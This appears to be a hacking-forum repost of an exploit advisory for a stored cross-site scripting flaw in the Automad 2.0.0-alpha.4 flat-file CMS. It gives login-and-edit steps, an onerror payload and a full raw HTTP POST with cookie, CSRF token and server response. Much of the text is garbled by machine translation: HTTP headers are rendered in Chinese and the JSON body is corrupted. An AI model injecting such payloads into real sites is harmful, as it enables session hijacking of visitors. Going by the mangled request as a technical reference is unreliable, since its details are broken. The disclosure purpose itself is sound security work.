H

Automad 2.0.0-Alpha.4-存储的跨站点脚本(XSS)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用title: Automad 2.0.0-Alpha.4-存储的跨站点脚本(XSS)
#日期: 20-06-2024
#利用作者:杰里马云惹不起马云托马斯(W3bn00b3r)
#供应商HomePage3360 https://automad.org
#软件link: https://github.com/marcantondahmen/automad
#类别: Web应用程序[Flat File CMS]
#版本: 2.0.0-alpha.4
#测试在: Docker版本26.1.4,构建5650F9B | Debian GNU/Linux 11
(靶心)
# 描述
持续的(存储的)跨站点脚本(XSS)漏洞已经存在
在Automad 2.0.0-Alpha.4中识别。此漏洞使攻击者
将恶意的JavaScript代码注入模板主体。注射
代码存储在平面文件CMS中,并在浏览器中执行
任何访问论坛的用户。这可以导致会话劫持,数据
盗窃和其他恶意活动。
#概念证明
* step-1:*登录Admin导航到端点
步骤2:将有一个默认的欢迎页面。您会找到一个选择
编辑它。
步骤3:导航到内容选项卡或
*main *
步骤4:输入XSS有效载荷-IMG SRC=X OneError=Alert(1)
request:
post/_api/page/data http/1.1
HOST: LOCALHOST
内容长度: 1822
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/105.0.5195.102 Safari/537.36
content-type:多部分/form-data;
边界=---- webkitformboundaryzhmxqbdtzstyqycv
ACCEPT: /
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2fsection=文本
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie:
AUTOMAD-8C069DF52082BEEE3C95CA17836FB8E2=D6EF49301B4EB159FBCB392E5137F6CB
连接:关闭
------ webkitformboundaryzhmxqbdtzstyqycv
content-disposition: form-data;名称='__ CSRF__'
49D68BC08CCA715368404D03C6F45257B3C0514C7CDF695B3E23B0A4476A4AC1
------ webkitformboundaryzhmxqbdtzstyqycv
content-disposition: form-data;名称='__ json__'
{'data': {'title':'welcome','+HERIO': {'blocks': [{'id':'kodzl-k vszcryojlqdyw9md2rgntouph','type':'paragraph','data': {'text':'testing
为了
XSS','大:false},'tunes': {'layout':null,'spacing': {'top':'','right':','right':' 'className':'','id':'}},{'id':'bo_fxlkl1lllgtkcsv_wp2sjqkxasda8','type':'paragraph'
确定
jerry/h1','大型:false},'tunes': {'layout':null,'spacing': {'top'33 360'','right':'','bottom':'','left':'},'className':'','id':''' }}],'automeDversion':'2.0.0-Alpha.4'},'+main': {'blocks': [{'id':'ld 9sujki6gn463orwjcy_icq5oqpyzvp','type':'paragraph','data': {'text':'you
已成功安装了汽车2。Brbrimgsrc=x
onerror=alert(1)br','large':false},'tunes':{'layout':null,'spacing':{'top':'','right':'','bottom':'','left'3336 0''},'className':'','id':'}}},{'iD':'nr_n3xqff94Kfn0jka5xgbi_-tbef9ot','
dashboard','primary -link':'/dashboard','primary': {'borderwidth':'2px','borderradius':'0.5rem','paddingvertvertaldlevertal':':'0.0.5rem',': rimaryopeninnewtab': false,“ secondaryText” :'','SecondaryLink':'','secondarystyle': {'borderwidth':'2px',' ','paddingvertical':'0.5REM'},'Secondaryopennewtab':true,'Justify':'start',''' gap':'1REM'},'tunes': {'layout':null,'spacing': {'top':'','right':'',' 'bottom':'','left':'},'className':'','id':'}}}],'automeververversion':'2.0。 0-alpha.4'}},'them_template':'project','dataFetchTime':'1718911139','url':'/'}
------ webkitformboundaryzhmxqbdtzstyqycv--
Response:
http/1.1 200好
server: nginx/1.24.0
Date: THU,2024年6月20日19:17:35 GMT
content-type:应用程序/json; charset=UTF-8
连接:关闭
X-Power-By: php/8.3.6
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 30`
{'code':200,'time':1718911055}
步骤5:进入主页时XSS触发器-http://localhost/
 
后退
顶部